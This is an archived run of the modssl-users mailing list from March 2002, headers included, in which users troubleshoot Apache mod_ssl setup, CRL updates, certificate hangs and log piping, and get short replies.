X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear folks, I want to download the CRL file which is available in the ldap server, how do I do that? Is there any command line utility to do that. Cheers Shiva __________________________________________________ Do You Yahoo!? Yahoo! Sports - live college hoops coverage http://sports.yahoo.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 19 14:14:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA28006; Tue, 19 Mar 2002 14:13:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from tech.pravexonline.com id OAA27978; Tue, 19 Mar 2002 14:12:44 +0100 (MET) Received: (qmail 19961 invoked from network); 19 Mar 2002 13:12:36 -0000 Received: from rubikonm.pravexdial.kiev.ua (HELO pravex.kiev.ua) (10.2.12.3) by tech.pravexdial.kiev.ua with SMTP; 19 Mar 2002 13:12:36 -0000 Received: (qmail 27900 invoked by uid 7794); 19 Mar 2002 13:12:35 -0000 Received: from max@pravex.kiev.ua by rubikon.pravex.kiev.ua with qmail-scanner-0.96 (. Clean. Processed in 0.092957 secs); 19 íÁÒ 2002 13:12:35 -0000 Received: from max.pravex.kiev.ua (HELO pravex.kiev.ua) (192.168.101.76) by rubikoni.pravex.kiev.ua with SMTP; 19 Mar 2002 13:12:35 -0000 Message-ID: <3C973964.9000108@pravex.kiev.ua> Date: Tue, 19 Mar 2002 15:13:08 +0200 From: Maxim Budyonny User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:0.9.7) Gecko/20020115 X-Accept-Language: en-us, uk, ru MIME-Version: 1.0 To: modssl-users@modssl.org Subject: apache mod_ssl failure Content-Type: text/plain; charset=KOI8-R; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Maxim Budyonny X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users 1. I have Apache 1.3.23 (DSO), mod_ssl (DSO module), openssl 0.9.6c (compiled with -fPIC) on Solaris 8. https server works as a virtual host. 2. In the errors log file of the http server (defined with ErrorLog directive) [Tue Mar 19 13:42:13 2002] [notice] child pid 2760 exit signal Segmentation Fault (11) 3. In the errors log file of the https virtual host (defined with ErrorLog directive) [Tue Mar 19 13:42:12 2002] [info] [client 213.169.65.218] send mmap timed out How can I fix thish problem? -- Maxim Budyonny ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 19 18:46:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA14903; Tue, 19 Mar 2002 18:45:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from fe170.worldonline.dk id SAA14881; Tue, 19 Mar 2002 18:44:40 +0100 (MET) Received: (qmail 11471 invoked by uid 0); 19 Mar 2002 17:44:31 -0000 Received: from 213.237.13.224.adsl.hc.worldonline.dk (HELO NEIGAARD?MOB) (213.237.13.224) by fe170.worldonline.dk with SMTP; 19 Mar 2002 17:44:31 -0000 Date: Tue, 19 Mar 2002 18:43:43 +0100 From: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-Mailer: The Bat! (v1.53d) X-Priority: 3 (Normal) Message-ID: <973708823.20020319184343@e-box.dk> To: modssl-users@modssl.org Subject: How does mod_ssl work with Apache? MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I have Apache running on port 80, and I want to SSL enable one of my VirtualHosts. I don't even know how to start mod_ssl properly. I found the following command somewhere in an example, but I'm not sure what it does, and right now it doesn't work (as I remember it has started before without errors), but this is what it says now: openssl s_client -connect 192.168.1.4:443 connect: Connection refused connect:errno=61 Why? Am I trying to connect to a wrong port? I really need some hints here please. -- Med venlig hilsen/Best regards, Søren Neigaard mailto:neigaard@e-box.dk -- "One finds limits by pushing them." ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 19 19:05:30 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA15848; Tue, 19 Mar 2002 19:04:50 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from statler.squaretrade.com id TAA15644; Tue, 19 Mar 2002 19:03:31 +0100 (MET) Received: from glen by statler.squaretrade.com with local (Exim 3.33 #1 (Debian)) id 16nNai-0001MZ-00 for ; Tue, 19 Mar 2002 09:40:08 -0800 Date: Tue, 19 Mar 2002 09:40:08 -0800 To: modssl-users@modssl.org Subject: Re: How does mod_ssl work with Apache? Message-ID: <20020319174008.GC3470@squaretrade.com> References: <973708823.20020319184343@e-box.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <973708823.20020319184343@e-box.dk> User-Agent: Mutt/1.3.25i From: Glen Mehn Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Glen Mehn X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users $APACHE_HOME/bin/apachectl startssl it's in the docs. On Tue, Mar 19, 2002 at 06:43:43PM +0100, S?ren Neigaard wrote: > I have Apache running on port 80, and I want to SSL enable one of my > VirtualHosts. I don't even know how to start mod_ssl properly. I found > the following command somewhere in an example, but I'm not sure what > it does, and right now it doesn't work (as I remember it has started > before without errors), but this is what it says now: > > openssl s_client -connect 192.168.1.4:443 > > connect: Connection refused > connect:errno=61 > > Why? Am I trying to connect to a wrong port? I really need some hints > here please. > > -- > Med venlig hilsen/Best regards, > S?ren Neigaard mailto:neigaard@e-box.dk > -- > "One finds limits by pushing them." > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- Glen S Mehn Lead Systems Administrator SquareTrade, Inc glen@squaretrade.com Building Trust in Transactions (sm) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 19 19:07:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA16095; Tue, 19 Mar 2002 19:06:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id TAA16089; Tue, 19 Mar 2002 19:05:54 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id NAA05846; Tue, 19 Mar 2002 13:11:15 -0500 Date: Tue, 19 Mar 2002 13:11:15 -0500 (EST) From: "R. DuFresne" To: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= cc: modssl-users@modssl.org Subject: Re: How does mod_ssl work with Apache? In-Reply-To: <973708823.20020319184343@e-box.dk> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=iso-8859-1 Content-Transfer-Encoding: 8BIT Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users If you built apache with modssl support , and have setup your httpd.conf file properly then you start appache like thus: apachectl startssl There are variations on this theme, but, this is the standard way to get apache up with ssl enabled once properly compiled and configured. Hope this help, Ron DuFresne On Tue, 19 Mar 2002, Søren Neigaard wrote: > I have Apache running on port 80, and I want to SSL enable one of my > VirtualHosts. I don't even know how to start mod_ssl properly. I found > the following command somewhere in an example, but I'm not sure what > it does, and right now it doesn't work (as I remember it has started > before without errors), but this is what it says now: > > openssl s_client -connect 192.168.1.4:443 > > connect: Connection refused > connect:errno=61 > > Why? Am I trying to connect to a wrong port? I really need some hints > here please. > > -- > Med venlig hilsen/Best regards, > Søren Neigaard mailto:neigaard@e-box.dk > -- > "One finds limits by pushing them." > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 19 19:12:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA16288; Tue, 19 Mar 2002 19:11:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from fe010.worldonline.dk id TAA16253; Tue, 19 Mar 2002 19:10:22 +0100 (MET) Received: (qmail 12950 invoked by uid 0); 19 Mar 2002 18:10:16 -0000 Received: from 213.237.13.224.adsl.hc.worldonline.dk (HELO NEIGAARD?MOB) (213.237.13.224) by fe010.worldonline.dk with SMTP; 19 Mar 2002 18:10:16 -0000 Date: Tue, 19 Mar 2002 19:09:24 +0100 From: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-Mailer: The Bat! (v1.53d) X-Priority: 3 (Normal) Message-ID: <1305250189.20020319190924@e-box.dk> To: "R. DuFresne" CC: modssl-users@modssl.org Subject: Re[2]: How does mod_ssl work with Apache? In-Reply-To: References: MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users That helped a lot, thanks :) /Søren Tuesday, March 19, 2002, 7:11:15 PM, R. wrote: RD> If you built apache with modssl support >, and have setup your httpd.conf file properly the FAQ on particulars as well as going over the default httpd.conf file RD> suppiled once apache is compiled with modssl support> then you start RD> appache like thus: RD> apachectl startssl RD> There are variations on this theme, but, this is the standard way to get RD> apache up with ssl enabled once properly compiled and configured. RD> Hope this help, RD> Ron DuFresne RD> On Tue, 19 Mar 2002, Søren Neigaard wrote: >> I have Apache running on port 80, and I want to SSL enable one of my >> VirtualHosts. I don't even know how to start mod_ssl properly. I found >> the following command somewhere in an example, but I'm not sure what >> it does, and right now it doesn't work (as I remember it has started >> before without errors), but this is what it says now: >> >> openssl s_client -connect 192.168.1.4:443 >> >> connect: Connection refused >> connect:errno=61 >> >> Why? Am I trying to connect to a wrong port? I really need some hints >> here please. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 19 19:19:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA16704; Tue, 19 Mar 2002 19:18:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id TAA16689; Tue, 19 Mar 2002 19:18:04 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id NAA05896; Tue, 19 Mar 2002 13:20:32 -0500 Date: Tue, 19 Mar 2002 13:20:32 -0500 (EST) From: "R. DuFresne" To: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= cc: modssl-users@modssl.org Subject: Re: Re[2]: How does mod_ssl work with Apache? In-Reply-To: <1305250189.20020319190924@e-box.dk> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=iso-8859-1 Content-Transfer-Encoding: 8BIT Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Welcome, my pleasure. Thanks, Ron DuFresne On Tue, 19 Mar 2002, Søren Neigaard wrote: > That helped a lot, thanks :) > > /Søren > > Tuesday, March 19, 2002, 7:11:15 PM, R. wrote: > > RD> If you built apache with modssl support you have not>>, and have setup your httpd.conf file properly RD> the FAQ on particulars as well as going over the default httpd.conf file > RD> suppiled once apache is compiled with modssl support> then you start > RD> appache like thus: > > RD> apachectl startssl > > RD> There are variations on this theme, but, this is the standard way to get > RD> apache up with ssl enabled once properly compiled and configured. > > RD> Hope this help, > > RD> Ron DuFresne > > RD> On Tue, 19 Mar 2002, Søren Neigaard wrote: > > >> I have Apache running on port 80, and I want to SSL enable one of my > >> VirtualHosts. I don't even know how to start mod_ssl properly. I found > >> the following command somewhere in an example, but I'm not sure what > >> it does, and right now it doesn't work (as I remember it has started > >> before without errors), but this is what it says now: > >> > >> openssl s_client -connect 192.168.1.4:443 > >> > >> connect: Connection refused > >> connect:errno=61 > >> > >> Why? Am I trying to connect to a wrong port? I really need some hints > >> here please. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 19 21:00:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA21812; Tue, 19 Mar 2002 20:59:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id UAA21800; Tue, 19 Mar 2002 20:58:57 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id A99694CE75E; Tue, 19 Mar 2002 20:58:56 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2JJvMc34533; Tue, 19 Mar 2002 20:57:22 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ilx.com id TAA17583; Tue, 19 Mar 2002 19:38:59 +0100 (MET) Received: from clifford.devo.ilx.com (clifford.devadm.ilx.com [172.27.56.72]) by ilx.com (8.11.0/8.9.3) with ESMTP id g2JIcrf80132 for ; Tue, 19 Mar 2002 13:38:53 -0500 (EST) (envelope-from JeffJ@ilx.com) Received: by clifford.devo.ilx.com with Internet Mail Service (5.5.2653.19) id ; Tue, 19 Mar 2002 13:38:52 -0500 Message-ID: From: Jeff Jirsa To: "Mod_Ssl List (E-mail)" Subject: Browser hanging on certificate Date: Tue, 19 Mar 2002 13:28:49 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jeff Jirsa X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I've setup two boxes with Mandrake 8.1, Apache, MySQL, and PHP. They each have two identical virtual hosts, except for the server name. The first one is a development box with a Thawte test certificate, and that setup works fine when I access the secure pages. The second is a production box and has a real certificate. When I try to access the secure pages, the browser sits there and spins. When I monitor the ssl_log for the virtual host I get: [19/Mar/2002 12:31:17 25196] [info] Connection to child 1 established (server ssl.atfi.com:443, client 208.223.138.103) and then nothing. Can anybody clue me into what may be wrong? ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 20 10:23:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA12996; Wed, 20 Mar 2002 10:22:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mx1.abcomp.be id KAA12987; Wed, 20 Mar 2002 10:21:52 +0100 (MET) From: Koen@abcomp.be Received: from mailhost.abcomp.be (suntech.abcomp.be [172.16.1.1]) by mx1.abcomp.be (8.11.2/8.11.0) with ESMTP id g2K9KDM06934 for ; Wed, 20 Mar 2002 10:20:13 +0100 (MET) Received: from ab-notes-sun.abcomp.be (localhost [127.0.0.1]) by mailhost.abcomp.be (8.9.3/8.9.3) with ESMTP id KAA17280 for ; Wed, 20 Mar 2002 10:14:24 +0100 (MET) To: modssl-users@modssl.org Subject: SSL server malfunctioning after updating a CRL MIME-Version: 1.0 X-Mailer: Lotus Notes Release 5.0.8 June 18, 2001 Message-ID: Date: Wed, 20 Mar 2002 10:12:16 +0100 X-MIMETrack: Serialize by Router on ab-notes-sun/AB Computers(Release 5.07a |May 14, 2001) at 03/20/2002 10:12:17 AM, Serialize complete at 03/20/2002 10:12:17 AM Content-Type: text/plain; charset="us-ascii" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Koen@abcomp.be X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, setup: *Sunblade100, Solaris 8 Apache 1.3.22 mod_ssl 2.8.5 OpenSSL 0.9.6c (other box with same problem Intel, RH linux 6.2) *an offline, standalone root CA running iPlanet certificate management system 4.22 on Windows NT 4.0 problem: Clients have to provide a valid certificate in order to get access. When a certificate gets revoked on the CA the CRL has to get transferred manually to the webserver by floppy (OCSP is not an option). After copying the new CRL in place and really stopping & starting Apache, clients can't connect to the webserver anymore. The dos CRLF was removed from the CRL and the headers are valid. Even when I change the headers of the original CRL (the working one) to another valid format, the same error occurs, so it's not because of the new CRL that the error occurs but any change in the current CRL. I changed -----BEGIN CERTIFICATE REVOCATION LIST----- to -----BEGIN X509 CRL------ and the same for the END tag of course. Symbolic links shouldn't have anything to with it since I'm using the SSLCARevocationFile directive. My guess is that mod_ssl keeps a hash / checksum somewhere and detects changes in the CRL, but I wouldn't know where to look for it. Does anybody know how I can replace the CRL? The server works perfectly when SSLVerification require. I didn't find any info on this in the faq of mod_ssl or OpenSSL. Best regards, Koen B. ssl_error_log shows this: [20/Mar/2002 09:32:44] [notice] child pid 1199 exit Segmentation Fault (11) ssl_engine_log: [20/Mar/2002 09:32:44 01199] [trace] Certificate Verification: depth: 1, subject: /C=fr/O=xxx/CN=Certificate Manager, issuer: /C=fr/O=xxx/CN=Certificate Manager[20/Mar/2002 09:32:44 01202] [info] Connection to child 4 established (server fake.domainname.com:443, client 192.168.0.10) [20/Mar/2002 09:32:44 01202] [info] Seeding PRNG with 512 bytes of entropy [20/Mar/2002 09:32:44 01202] [trace] OpenSSL: Handshake: start [20/Mar/2002 09:32:44 01202] [trace] OpenSSL: Loop: before/accept initialization[20/Mar/2002 09:32:44 01202] [debug] OpenSSL: read 0/11 bytes from BIO#00208B10 [mem: 0021EC58] (BIO dump follows) +-------------------------------------------------------------------------+ +-------------------------------------------------------------------------+ [20/Mar/2002 09:32:44 01202] [info] Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?] relevant snippet from httpd.conf: ... SSLPassPhraseDialog builtin SSLSessionCache dbm:/usr/local/apache/logs/ssl_scache SSLSessionCacheTimeout 300 SSLMutex file:/usr/local/apache/logs/ssl_mutex SSLRandomSeed startup file:/usr/local/apache/randfile.rnd 512 SSLRandomSeed connect file:/usr/local/apache/randfile.rnd 512 SSLLog /usr/local/apache/logs/ssl_engine_log SSLLogLevel debug ErrorLog logs/ssl_error_log ... DocumentRoot "/usr/local/apache/htdocs" ServerName fake.domainname.com ServerAdmin root@fake.domainname.com ErrorLog /usr/local/apache/logs/error_log TransferLog /usr/local/apache/logs/access_log SSLEngine on SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLCertificateFile /usr/local/apache/conf/ssl.crt/fake.domainname.com.crt SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/fake.domainname.com.key SSLCACertificateFile /usr/local/apache/conf/ssl.crt/ca.testdomain.com.crt SSLCARevocationFile /usr/local/apache/conf/ssl.crl/ca.testdomain.com.crl SSLVerifyClient require SSLVerifyDepth 5 ... ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 20 10:26:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA13126; Wed, 20 Mar 2002 10:25:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mhub.AXP.MDX.AC.UK id KAA13114; Wed, 20 Mar 2002 10:24:58 +0100 (MET) Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636) id <01KFKUH0S4MO00WMCI@mdx.ac.uk> for modssl-users@modssl.org; Wed, 20 Mar 2002 09:27:28 +0000 (GMT) Received: from mdx-bg-staff1.nw.mdx.ac.uk (mdx-bg-staff1.mdx.ac.uk [158.94.39.4]) by mdx.ac.uk (PMDF V6.1-1 #38636) with ESMTP id <01KFKUH04K1M00Y9CT@mdx.ac.uk> for modssl-users@modssl.org; Wed, 20 Mar 2002 09:27:27 +0000 (GMT) Received: from MDX-BG-STAFF1/SpoolDir by mdx-bg-staff1.nw.mdx.ac.uk (Mercury 1.48); Wed, 20 Mar 2002 09:24:54 +0000 Received: from SpoolDir by MDX-BG-STAFF1 (Mercury 1.48); Wed, 20 Mar 2002 09:24:16 +0000 Date: Wed, 20 Mar 2002 09:24:06 +0000 From: a.moon@mdx.ac.uk Subject: SSL server malfunctioning after updating a CRL To: modssl-users@modssl.org Message-id: <8676103117C@mdx-bg-staff1.nw.mdx.ac.uk> Content-transfer-encoding: 7BIT X-Autoreply-From: X-Comment: Middlesex University has scanned this message for viruses. Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: a.moon@mdx.ac.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am not in the office for the week 18-22 March 2002 If it's an Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter that requires urgent attention then please contact either Kirsteen1 or Sanjay1 who should be able to help. Otherwise I will contact you as soon as possible on my return. If you are student on MKT3035 GIS for Business - I will contact you asap or if urgent please contact the module tutor All the best Alex ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 20 19:03:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA10284; Wed, 20 Mar 2002 19:02:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA10273; Wed, 20 Mar 2002 19:01:56 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id EA0C24CE738; Wed, 20 Mar 2002 19:01:55 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2KENpV23497; Wed, 20 Mar 2002 15:23:51 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id OAA25740; Wed, 20 Mar 2002 14:28:06 +0100 (MET) Date: Wed, 20 Mar 2002 14:28:06 +0100 (MET) Message-Id: <200203201328.OAA25740@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] SSLLog into pipe (PR#678) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: martin vetter Version: 2.8.5 OS: mac os 10.1.3 Submission from: (NULL) (62.16.152.206) SSLLog "|/usr/sbin/rotatelogs /var/log/httpd/ssl_engine_log 86400" does work. SSLLog "| /usr/sbin/rotatelogs /var/log/httpd/ssl_engine_log 86400" does not (note the whitespace after "|"). "ErrorLog" and "CustomLog" do support whitespace after the "|" ... bug or feature? or am i missing something? ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 21 12:51:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA29271; Thu, 21 Mar 2002 12:50:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from bnls901a id MAA29238; Thu, 21 Mar 2002 12:49:21 +0100 (MET) Received: by bnls205a.sni.co.uk with Internet Mail Service (5.5.2653.19) id ; Thu, 21 Mar 2002 11:49:38 -0000 Message-ID: <077AD8BDA52CD41197E900104B42A584EF9098@bnls230a.sni.co.uk> From: "Bray, Mike" To: "'modssl-users@modssl.org'" Subject: RE: Rewrite and SSLRequire Date: Thu, 21 Mar 2002 11:49:38 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bray, Mike" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Here is the fix for those who are interested. Under your virtual host put RewriteEngine On Under the directory put SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128 Options Followsymlinks RewriteEngine On RewriteBase / RewriteRule (^servlet/.*$) http://localhost:8888/$1 [P] etc. Note that the RewriteRule does not have the first / and the destination has the / at the end. This is because of RewriteBase. I have found that if you do not put RewriteBase under the from visp.engelschall.com id PAA05448; Thu, 21 Mar 2002 15:05:40 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 32F434CE756; Thu, 21 Mar 2002 15:05:38 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2LE4nP46637; Thu, 21 Mar 2002 15:04:49 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from cyclops.soft.net id NAA01963; Thu, 21 Mar 2002 13:48:55 +0100 (MET) Received: from email.eximsoft.com (gw.eximsoft.com [164.164.87.130]) by cyclops.soft.net (Switch-2.0.1/Switch-2.0.1) with ESMTP id g2LLVq809649 for ; Thu, 21 Mar 2002 16:31:54 -0500 (GMT) Received: from localhost (localhost [127.0.0.1]) by email.eximsoft.com (Postfix) with ESMTP id 03650691F7 for ; Thu, 21 Mar 2002 18:18:16 +0530 (IST) Received: from EWSUC042 (unknown [10.10.10.64]) by email.eximsoft.com (Postfix) with SMTP id 384BA691F3 for ; Thu, 21 Mar 2002 18:18:15 +0530 (IST) Message-ID: <00cf01c1d0d7$457d2520$400a0a0a@EWSUC042> From: "Janardhan" To: Subject: Apachectl starts but I am unable to connect to my https site Date: Thu, 21 Mar 2002 18:22:34 +0530 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_00CC_01C1D105.5EEB86E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Virus-Scanned: by AMaViS snapshot-20010407 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Janardhan" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_00CC_01C1D105.5EEB86E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hello modssl-users, I have configured 2 seperate Apache servers in different machines with = modssl. I created self CA using openssl and created server certificates = also.=20 One of the Apache https server works fine and I am facing problem with = another server. The problem is Apachectl starts but I am unable to = connect to my https site using browser. The procedure I follow in both = machines are same. Please help me in identifying this problem by replying to = janardhan.r@eximsoft.com=20 with thanks and regards, R.Janardhan. ------=_NextPart_000_00CC_01C1D105.5EEB86E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hello modssl-users,
 
I have configured 2 seperate Apache = servers in=20 different machines with modssl. I created self CA using openssl and = created=20 server certificates also.
One of the Apache = https server works fine=20 and I am facing problem with another server. The problem is Apachectl = starts but=20 I am unable to connect to my https site using browser. The procedure I = follow in=20 both machines are same.
 
Please help me in identifying this = problem=20 by replying to janardhan.r@eximsoft.com=20
 
with thanks and regards,
R.Janardhan.
